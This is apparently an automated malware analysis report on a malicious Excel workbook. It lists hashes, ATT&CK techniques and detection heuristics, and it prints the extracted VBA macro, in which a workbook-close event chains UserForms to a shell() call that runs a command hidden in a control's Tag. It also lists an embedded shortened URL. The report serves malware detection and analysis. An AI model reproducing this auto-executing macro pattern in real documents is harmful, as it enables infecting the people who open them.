Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6865ef6597edb3cd…

MALICIOUS

Office (OOXML)

50.6 KB Created: 2012-04-22 18:55:29 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-05-22
MD5: 5628c045459159df6ffd24ff672d5f0e SHA-1: 7262d4add81921afcd48e78512a527b37f4bc497 SHA-256: 6865ef6597edb3cd0fed6c3ad55bedfb34916b3c8d86a139debdcdcdd9d7f005
130 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The `Workbook_BeforeClose` event triggers the display of `UserForm1`, and the `UserForm_Terminate` subroutine contains a call to `shell()` which is used to execute arbitrary commands. This indicates the macro is designed to download and execute a second-stage payload. The presence of hidden sheets further supports the malicious intent.

Heuristics 5

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Private Sub UserForm_Terminate()
shell# _
UserForm2 _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 2 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.google.com In document text (OOXML body / shared strings)
    • http://www.j.mp/djasidjaisjdiasjidIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2187 bytes
SHA-256: 8ca7cad4331f3ad8da58693f2716c1528bdf0bfba05827332df3e7d5b064ece7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4E5956A1-C5C0-4131-B696-3BCA379355DF}{60375DD8-631F-46B8-A961-7E341B693F5E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Terminate()
shell# _
UserForm2 _
.CloseTheWindow _
.Tag
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private _
Sub _
Workbook_BeforeClose(Cancel As Boolean)
UserForm1 _
.Show
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F829481F-315A-4874-B3E2-5D96836FF130}{824DF52D-8792-4FB5-A729-F403C45EF985}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Option Explicit


Private Sub UserForm_Terminate()
Unload Me 'UserForm1
UserForm2 _
.Show
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19968 bytes
SHA-256: 5436af8301e1dd5057e5e46e34982e424c5140c52ef166f4cdd2fe02ba857e37

Open this report in the interactive analyzer, or submit your own file for analysis.